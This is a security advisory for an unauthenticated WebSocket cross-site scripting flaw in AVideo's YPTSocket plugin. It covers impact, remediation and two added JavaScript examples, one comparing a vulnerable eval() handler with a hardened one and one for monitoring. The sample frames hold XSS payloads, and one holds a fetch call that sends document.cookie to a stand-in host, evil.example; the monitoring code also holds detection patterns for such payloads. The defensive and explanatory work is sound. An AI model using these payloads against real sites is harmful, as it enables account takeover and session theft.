CVE-2026-40911

WWBN · AVideo

A WebSocket-based cross-site scripting (XSS) vulnerability in the AVideo YPTSocket plugin allows unauthenticated attackers to achieve universal account takeover.

Executive summary

An unauthenticated XSS vulnerability in the WWBN AVideo YPTSocket plugin allows attackers to remotely execute JavaScript in the context of other users, leading to full account takeover.

Vulnerability

The YPTSocket server accepts JSON messages over its WebSocket endpoint and relays them to the other connected clients without sanitizing their contents. The client-side script passes fields from those relayed messages to eval(), so a string supplied by an unauthenticated attacker is executed as JavaScript in every recipient's browser, in the AVideo origin, with access to that user's session.
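The pattern described above, shown as an added illustration rather than the AVideo/YPTSocket source: a message handler that evaluates a relayed JSON field, beside a hardened handler that dispatches only to pre-registered callbacks by name. The field names callback and msg are assumed from the monitoring guidance in this advisory; the plugin's real message schema is not reproduced here.

```javascript
// Added illustration (not AVideo/YPTSocket code) of an eval() sink fed by a relayed
// JSON field, and of a hardened dispatcher. Field names `callback` and `msg` are
// assumptions; the plugin's actual schema is not reproduced here.

// Constructed sample frames, as the relay would deliver them to every connected client.
const BENIGN_FRAME = JSON.stringify({ type: "chat", msg: "hello", callback: "onChat" });
const MALICIOUS_FRAME = JSON.stringify({
  type: "chat",
  msg: "<img src=x onerror=alert(document.cookie)>",
  callback: "globalThis.pwned = true", // attacker-controlled string reaching eval()
});

// Vulnerable pattern: the client trusts the relayed JSON and evaluates a field.
// In a real client a benign value like "onChat" would resolve to a global function;
// here only the malicious frame is exercised, which plants a marker on the global object.
function vulnerableOnMessage(rawFrame) {
  const data = JSON.parse(rawFrame);
  // eval() sink: whatever string the relay forwards runs as script in this user's origin.
  return eval(data.callback);
}

// Hardened pattern: the callback field is a lookup key into a frozen allow-list,
// never code, and the message body is treated as opaque text.
const HANDLERS = Object.freeze({
  onChat(text) { return { kind: "chat", text }; },
  onViewers(text) { return { kind: "viewers", count: Number(text) || 0 }; },
});

function hardenedOnMessage(rawFrame) {
  let data;
  try { data = JSON.parse(rawFrame); } catch { return null; }
  if (data === null || typeof data !== "object") return null;
  if (typeof data.callback !== "string" || !Object.hasOwn(HANDLERS, data.callback)) {
    return null; // unknown callback name: drop the frame instead of evaluating it
  }
  // msg stays a string; a DOM renderer would assign it to textContent, never innerHTML.
  const text = typeof data.msg === "string" ? data.msg : "";
  return HANDLERS[data.callback](text);
}

// Demonstration: the vulnerable handler executes the payload, the hardened one drops it.
console.log("vulnerable:", vulnerableOnMessage(MALICIOUS_FRAME), "pwned =", globalThis.pwned);
console.log("hardened (malicious):", hardenedOnMessage(MALICIOUS_FRAME));
console.log("hardened (benign):", hardenedOnMessage(BENIGN_FRAME));
```

The hardened handler closes the sink rather than filtering the input: no string from the wire is ever interpreted as code, and an unrecognised callback name is discarded instead of being passed through.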

Business impact

Rated CVSS 10.0 (critical). Because the payload runs in the victim's authenticated browser session, an attacker can hijack administrative sessions, read sensitive user data, and perform privileged actions across the platform as those users, resulting in a total loss of platform integrity and user trust.

Remediation

Immediate Action: Apply the fix provided in commit c08694bf6264eb4decceb78c711baee2609b4efd or update to the latest patched version.

Proactive Monitoring: Monitor WebSocket traffic to the YPTSocket endpoint for JSON messages whose msg or callback fields carry HTML markup or JavaScript rather than the plain values the client expects.

Compensating Controls: If patching is delayed, disable the YPTSocket plugin entirely, accepting the loss of the functionality it provides, to remove the path to arbitrary script execution in users' browsers.
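A starting point for the monitoring step above, as an added example that is not part of the original advisory or the AVideo project: a heuristic check over captured WebSocket frames that flags callback values which are not plain identifiers and msg values that contain markup or script. The field names and the identifier-only rule for callback are assumptions to be tuned against the schema seen in your own traffic.

```javascript
// Added illustration (not AVideo/YPTSocket code): heuristic triage of relayed
// WebSocket frames for the `msg` and `callback` fields named in the advisory.
// The field names and the "callback must be an identifier" rule are assumptions.

const IDENTIFIER = /^[A-Za-z_$][\w$]*$/; // what a legitimate callback name is assumed to look like
const MARKUP_OR_SCRIPT =
  /<\s*(script|img|svg|iframe)|\bon\w+\s*=|javascript:|eval\s*\(|document\.cookie/i;

// Returns the list of rules a frame tripped; an empty array means nothing suspicious.
function flagFrame(rawFrame) {
  const reasons = [];
  let data;
  try { data = JSON.parse(rawFrame); } catch { return ["not-json"]; }
  if (data === null || typeof data !== "object") return ["not-object"];

  if ("callback" in data) {
    if (typeof data.callback !== "string") reasons.push("callback-not-string");
    else if (!IDENTIFIER.test(data.callback)) reasons.push("callback-not-identifier");
  }
  if (typeof data.msg === "string" && MARKUP_OR_SCRIPT.test(data.msg)) {
    reasons.push("msg-contains-markup-or-script");
  }
  return reasons;
}

// Constructed sample frames standing in for a capture of the relay's traffic.
const SAMPLE_FRAMES = [
  JSON.stringify({ msg: "hello everyone", callback: "onChat" }),
  JSON.stringify({ msg: "hi", callback: "fetch('https://evil.example/?c='+document.cookie)" }),
  JSON.stringify({ msg: "<img src=x onerror=alert(1)>", callback: "onChat" }),
  "{not json",
];

// Runs the check over a batch and keeps only the frames that tripped at least one rule.
function triage(frames) {
  return frames
    .map((frame, index) => ({ index, reasons: flagFrame(frame) }))
    .filter((hit) => hit.reasons.length > 0);
}

for (const hit of triage(SAMPLE_FRAMES)) {
  console.log(`frame ${hit.index}: ${hit.reasons.join(", ")}`);
}
```

Treat hits as leads for investigation, not as a block list: the regexes catch the obvious payload shapes but a determined attacker can encode around them, which is why the fix in the commit above, not monitoring, is the actual remediation.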

Exploitation status

Public Exploit Available: No

Analyst recommendation

This vulnerability is exceptionally dangerous because it requires no authentication and a single relayed message reaches every connected client at once. Administrators must prioritize applying the vendor-supplied fix to prevent widespread account compromise.